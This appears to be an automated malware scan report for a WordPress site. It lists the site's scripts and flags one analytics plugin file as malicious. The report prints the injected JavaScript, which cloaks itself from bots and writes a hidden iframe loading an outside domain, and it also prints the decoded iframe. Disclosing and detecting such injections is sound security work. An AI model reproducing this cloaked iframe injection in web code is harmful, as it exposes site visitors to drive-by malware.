Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=canduco.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://canduco.com/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Wed, 01 Oct 2014 17:15:32 GMT Pragma: no-cache Location: http://www.canduco.com/ Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Pingback: http://www.canduco.com/xmlrpc.php X-Powered-By: PleskLin | clean |
http://www.canduco.com/ | 200 OK Content-Length: 43915 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js | 200 OK Content-Length: 92629 Content-Type: text/javascript | clean |
http://www.canduco.com/wp-content/themes/canduco/js/jquery.prettyPhoto.js | 200 OK Content-Length: 35734 Content-Type: text/javascript | clean |
http://www.canduco.com/wp-includes/js/jquery/jquery.js?ver=1.10.2 | 200 OK Content-Length: 1363 Content-Type: text/javascript | clean |
http://www.canduco.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 0 Content-Type: text/javascript | clean |
http://www.canduco.com/wp-content/plugins/testimonial-slider/js/testimonial.js?ver=1.0.1 | 200 OK Content-Length: 91331 Content-Type: text/javascript | clean |
http://www.canduco.com/wp-content/plugins/testimonial-slider/js/jquery.cycle.js?ver=1.0.1 | 200 OK Content-Length: 32029 Content-Type: text/javascript | clean |
http://www.canduco.com/wp-content/plugins/testimonial-slider/js/jquery.easing.js?ver=1.0.1 | 200 OK Content-Length: 7081 Content-Type: text/javascript | clean |
http://www.canduco.com/wp-content/plugins/testimonial-slider/js/jquery.touchwipe.js?ver=1.0.1 | 200 OK Content-Length: 1530 Content-Type: text/javascript | clean |
http://www.canduco.com/wp-content/plugins/wp-video-lightbox/js/jquery.prettyPhoto.js?ver=3.1.5 | 200 OK Content-Length: 31655 Content-Type: text/javascript | clean |
http://www.canduco.com/wp-content/plugins/wp-video-lightbox/js/video-lightbox.js?ver=3.1.5 | 200 OK Content-Length: 6846 Content-Type: text/javascript | clean |
http://www.canduco.com/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.plugins.min.js?ver=3.8.4 | 200 OK Content-Length: 17196 Content-Type: text/javascript | clean |
http://www.canduco.com/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.revolution.min.js?ver=3.8.4 | 200 OK Content-Length: 56020 Content-Type: text/javascript | clean |
http://www.canduco.com/wp-content/plugins/google-analyticator/external-tracking.min.js?ver=6.4.7.3 | 200 OK Content-Length: 1097 Content-Type: text/javascript | malicious |
Malicious code found. Script contains blacklisted domain: dostucial.marianovicario.com.ar ...[199 bytes skipped]... e(e,t,n){var r=(e+"").toLowerCase();var i=(t+"").toLowerCase();var s=0;if((s=r.indexOf(i,n))!==-1){return s}return false}function t(){var t=["AppleWebKit","Windows NT 6.3","Windows NT 6.2","rv:11.0","Linux","Android","Googlebot","IEMobile"];var n=false;for(var r in t){if(e(navigator.userAgent,t[r])){n=true;break}}return n}var n=getCookie("princesse_ato")===undefined;if(!t()&&n){document.write("<if"+"rame src="+'"http://dostucial.marianovicario.com.ar/idealsoftware17.html?a" style="border-right-style: dotted;top: -998px;left: -998px;border-top-width: 5px;position: absolute;border-top-width: 5px;" height="140" width="140"></iframe>');var r=new Date((new Date).getTime()+48*60*60*1e3);document.cookie="princesse_ato=1; path=/; expires="+r.toUTCString()}})() Decoded script: <iframe src="http://dostucial.marianovicario.com.ar/idealsoftware17.html?a" style="border-right-style: dotted;top: -998px;left: -998px;border-top-width: 5px;position: absolute;border-top-width: 5px;" height="140" width="140"></iframe> | ||
http://www.canduco.com/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.46.0-2013.11.21 | 200 OK Content-Length: 14804 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: canduco.com
Result:
HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache, must-revalidate, max-age=0
Connection: close
Date: Wed, 01 Oct 2014 17:15:32 GMT
Pragma: no-cache
Location: http://www.canduco.com/
Server: Apache
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
X-Pingback: http://www.canduco.com/xmlrpc.php
X-Powered-By: PleskLin
...0 bytes of data.
GET / HTTP/1.1
Host: canduco.com
Result:
HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache, must-revalidate, max-age=0
Connection: close
Date: Wed, 01 Oct 2014 17:15:32 GMT
Pragma: no-cache
Location: http://www.canduco.com/
Server: Apache
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
X-Pingback: http://www.canduco.com/xmlrpc.php
X-Powered-By: PleskLin
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: canduco.com
Referer: http://www.google.com/search?q=canduco.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: canduco.com
Referer: http://www.google.com/search?q=canduco.com
Result:
The result is similar to the first query. There are no suspicious redirects found.